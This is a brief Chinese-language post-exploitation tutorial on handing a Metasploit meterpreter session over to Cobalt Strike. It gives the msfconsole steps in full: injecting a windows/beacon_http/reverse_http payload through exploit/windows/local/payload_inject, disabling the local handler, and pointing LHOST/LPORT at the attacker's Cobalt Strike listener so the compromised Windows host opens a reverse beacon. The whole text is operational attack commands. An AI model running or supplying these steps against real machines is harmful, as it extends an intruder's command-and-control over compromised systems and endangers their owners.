准备
首先msf获得一个meterpreter会话
把会话挂到后台,选用其他exploit用于传递会话
background
派生一个新的shell给cs,那么msf里面用到的exploit是
exploit/windows/local/payload_inject
操作
选用exploit
use exploit/windows/local/payload_inject
选择payload,选用的payload一定要跟cs下监听的payload方式一样
set payload windows/beacon_http/reverse_http
禁止产生一个新的handler
set disablepayloadhandler true
设置ip,ip为cs监听会话用的ip
set LHOST IP
设置端口,端口为cs对应的接受反弹shell的端口
set LPORT 端口
设置需要派送的meterpreter
set session 1
开始执行
exploit
执行之后即可得到一个cs的会话